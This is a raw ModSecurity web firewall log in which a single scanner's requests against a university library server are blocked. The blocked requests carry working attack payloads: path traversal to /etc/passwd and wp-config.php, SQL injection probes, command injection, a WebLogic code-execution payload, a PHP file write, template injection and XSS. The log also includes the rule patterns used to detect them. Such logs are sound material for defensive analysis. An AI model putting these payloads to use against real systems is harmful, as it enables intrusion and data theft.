"digilib.unla.ac.id"] [uri "/api/get-organizations"] [unique_id "ZO14FcCo-f0AAAhl0AgAAAAi"]
[Tue Aug 29 11:46:13.404650 2023] [:error] [pid 2228] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:file: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/glpi/plugins/barcode/front/send.php"] [unique_id "ZO14FcCo-f0AAAi0JJwAAAAK"]
[Tue Aug 29 11:46:13.462955 2023] [:error] [pid 2149] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filepath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:filepath: ../../../../../../../../../../etc/passwd\\x00.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/ipecs-cm/download"] [unique_id "ZO14FcCo-f0AAAhl0AsAAAAi"]
[Tue Aug 29 11:46:14.369100 2023] [:error] [pid 2239] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:url: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilib.unla.ac.id"] [uri "/index.php/bbs/index/download"] [unique_id "ZO14FsCo-f0AAAi-Q-8AAAAH"]
[Tue Aug 29 11:46:14.483183 2023] [:error] [pid 1905] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../ found within ARGS:filename: ../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/org_execl_download.action"] [unique_id "ZO14FsCo-f0AAAdxUrkAAAAC"]
[Tue Aug 29 11:46:15.645137 2023] [:error] [pid 2217] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:webpage. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:webpage: ../../AutoCE.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/IND780/excalweb.dll"] [unique_id "ZO14F8Co-f0AAAipS6sAAAAF"]
[Tue Aug 29 11:46:18.431419 2023] [:error] [pid 2233] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:QueryText. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  >= `<$ found within ARGS:QueryText: (dInDate >= `<$dateCurrent(-7)$>`)"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/cs/idcplg"] [unique_id "ZO14GsCo-f0AAAi5uEwAAAAS"]
[Tue Aug 29 11:46:18.479525 2023] [:error] [pid 2144] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:country. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../ found within ARGS:country: /../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/cities"] [unique_id "ZO14GsCo-f0AAAhgoNoAAAAb"]
[Tue Aug 29 11:46:19.412373 2023] [:error] [pid 1905] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:QueryText. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  >= `<$ found within ARGS:QueryText: (dInDate >= `<$dateCurrent(-7)$>`)"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/cs/idcplg"] [unique_id "ZO14G8Co-f0AAAdxUs4AAAAC"]
[Tue Aug 29 11:46:19.499471 2023] [:error] [pid 2113] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:{"package":";id;#"}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ; found within ARGS_NAMES:{\\x22package\\x22:\\x22;id;#\\x22}: {\\x22package\\x22:\\x22;id;#\\x22}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilib.unla.ac.id"] [uri "/wbm/plugins/wbm-legal-information/platform/pfcXXX/licenses.php"] [unique_id "ZO14G8Co-f0AAAhBSG4AAAAX"]
[Tue Aug 29 11:46:20.657477 2023] [:error] [pid 2149] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS_NAMES:/etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS_NAMES:/etc/passwd: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilib.unla.ac.id"] [uri "/Export_Log"] [unique_id "ZO14HMCo-f0AAAhl0CcAAAAi"]
[Tue Aug 29 11:46:22.501917 2023] [:error] [pid 2157] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:customerTID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: UNION SELECT found within ARGS:customerTID: unpossible' UNION SELECT 0,0,0,11132*379123,0,0,0,0--"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/cgi-bin/supportInstaller"] [unique_id "ZO14HsCo-f0AAAhtjkIAAAAq"]
[Tue Aug 29 11:46:27.377608 2023] [:error] [pid 2137] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:f. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:f: /./etc/./passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilib.unla.ac.id"] [uri "/img.php"] [unique_id "ZO14I8Co-f0AAAhZRo0AAAAG"]
[Tue Aug 29 11:46:27.603137 2023] [:error] [pid 2228] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:working_dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../ found within ARGS:working_dir: /../../../../../../../../../../etc/"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/laravel-filemanager/download"] [unique_id "ZO14I8Co-f0AAAi0JNcAAAAK"]
[Tue Aug 29 11:46:28.442057 2023] [:error] [pid 2137] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:path: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/cgit/cgit.cgi/git/objects/"] [unique_id "ZO14JMCo-f0AAAhZRp0AAAAG"]
[Tue Aug 29 11:46:28.526948 2023] [:error] [pid 2158] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:style. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c found within ARGS:style: ..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5cwindows\\x5cwin.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/webmail/calendar/minimizer/index.php"] [unique_id "ZO14JMCo-f0AAAhui4cAAAAr"]
[Tue Aug 29 11:46:29.790626 2023] [:error] [pid 2242] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:style. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c/ found within ARGS:style: ..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c/etc\\x5cpasswd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/webmail/calendar/minimizer/index.php"] [unique_id "ZO14JcCo-f0AAAjCa8EAAAAB"]
[Tue Aug 29 11:46:30.566400 2023] [:error] [pid 2157] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:test_handle. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  = ( found within ARGS:test_handle: com.tangosol.coherence.mvel2.sh.ShellSession('weblogic.work.ExecuteThread currentThread = (weblogic.work.ExecuteThread)Thread.currentThread(); weblogic.work.WorkAdapter adapter = currentThread.getCurrentWork(); java.lang.reflect.Field field = adapter.getClass().getDeclaredField(\\x22connectionHandler\\x22);field.setAccessible(true);Object obj = field.get(adapter);weblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImp..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/console/images/%2e%2e%2fconsole.portal"] [unique_id "ZO14JsCo-f0AAAhtjlAAAAAq"]
[Tue Aug 29 11:46:30.607387 2023] [:error] [pid 2245] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14JsCo-f0AAAjFodYAAAAF"]
[Tue Aug 29 11:46:31.357050 2023] [:error] [pid 2228] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: :/// found within ARGS:url: file:///etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/api/geojson"] [unique_id "ZO14J8Co-f0AAAi0JPoAAAAK"]
[Tue Aug 29 11:46:31.383361 2023] [:error] [pid 2248] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:file: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/download/index.php"] [unique_id "ZO14J8Co-f0AAAjIhhkAAAAJ"]
[Tue Aug 29 11:46:32.435060 2023] [:error] [pid 2252] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:picUrl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ./../ found within ARGS:picUrl: ./../config/database.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/public/index.php/material/Material/_download_imgage"] [unique_id "ZO14KMCo-f0AAAjM698AAAAT"]
[Tue Aug 29 11:46:33.502285 2023] [:error] [pid 2242] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:target. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:target: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14KcCo-f0AAAjCa90AAAAB"]
[Tue Aug 29 11:46:34.353501 2023] [:error] [pid 2253] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:InternalFile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../ found within ARGS:InternalFile: ../../../../../../../../../../../../../../Windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/"] [unique_id "ZO14KsCo-f0AAAjN0NEAAAAU"]
[Tue Aug 29 11:46:35.447567 2023] [:error] [pid 2242] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:REINDEX:phpcli. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  \\x22<? found within ARGS:REINDEX:phpcli: echo \\x22<?php phpinfo();\\x22 > /var/www/html/magmi/web/info.php; php "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/magmi/web/magmi_saveprofile.php"] [unique_id "ZO14K8Co-f0AAAjCa@UAAAAB"]
[Tue Aug 29 11:46:39.471220 2023] [:error] [pid 2252] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:file: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/usr-cgi/logdownload.cgi"] [unique_id "ZO14L8Co-f0AAAjM6-MAAAAT"]
[Tue Aug 29 11:46:41.432466 2023] [:error] [pid 2137] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../ found within ARGS:name: /../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/webapi/file/transfer"] [unique_id "ZO14McCo-f0AAAhZRrIAAAAG"]
[Tue Aug 29 11:46:42.363416 2023] [:error] [pid 2248] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: } found within ARGS:username: {{username}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilib.unla.ac.id"] [uri "/admin/ajax.php"] [unique_id "ZO14MsCo-f0AAAjIhikAAAAJ"]
[Tue Aug 29 11:46:43.613322 2023] [:error] [pid 2149] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:id: -1 union select 1,md5(999999999),3,4,5-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/admin/manage_user.php"] [unique_id "ZO14M8Co-f0AAAhl0FgAAAAi"]
[Tue Aug 29 11:46:47.394769 2023] [:error] [pid 1988] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:refurl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: }}}; found within ARGS:refurl: }}};alert(document.domain)//"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/owa/auth/frowny.aspx"] [unique_id "ZO14N8Co-f0AAAfEB-8AAAAO"]
[Tue Aug 29 11:46:49.695787 2023] [:error] [pid 2231] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: UNION SELECT found within ARGS:id: -1 UNION SELECT 1,md5(999999999),3,4,5,6,7,8--"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14OcCo-f0AAAi3Z1wAAAAP"]
[Tue Aug 29 11:46:51.612092 2023] [:error] [pid 2242] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:file: ../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/sites/all/modules/avatar_uploader/lib/demo/view.php"] [unique_id "ZO14O8Co-f0AAAjCbAgAAAAB"]
[Tue Aug 29 11:46:57.400907 2023] [:error] [pid 1988] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:cmd: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilib.unla.ac.id"] [uri "/cgi-bin/execute_cmd.cgi"] [unique_id "ZO14QcCo-f0AAAfECA4AAAAO"]
[Tue Aug 29 11:47:00.474251 2023] [:error] [pid 2268] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14RMCo-f0AAAjcHWkAAAAY"]
[Tue Aug 29 11:47:01.364063 2023] [:error] [pid 2276] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:href. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:href: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/wp-content/plugins/tinymce-thumbnail-gallery/php/download-image.php"] [unique_id "ZO14RcCo-f0AAAjkMz4AAAAI"]
[Tue Aug 29 11:47:02.530961 2023] [:error] [pid 1988] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:partcode. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22);{/ found within ARGS:partcode: {dede:field name='source' runphp='yes'}echo md5(\\x22CVE-2018-7700\\x22);{/dede:field}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/tag_test_action.php"] [unique_id "ZO14RsCo-f0AAAfECB0AAAAO"]
[Tue Aug 29 11:47:03.420305 2023] [:error] [pid 2253] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:likebtn_q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:likebtn_q: aHR0cDovL2xpa2VidG4uY29tLm9hc3QubWU=\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] 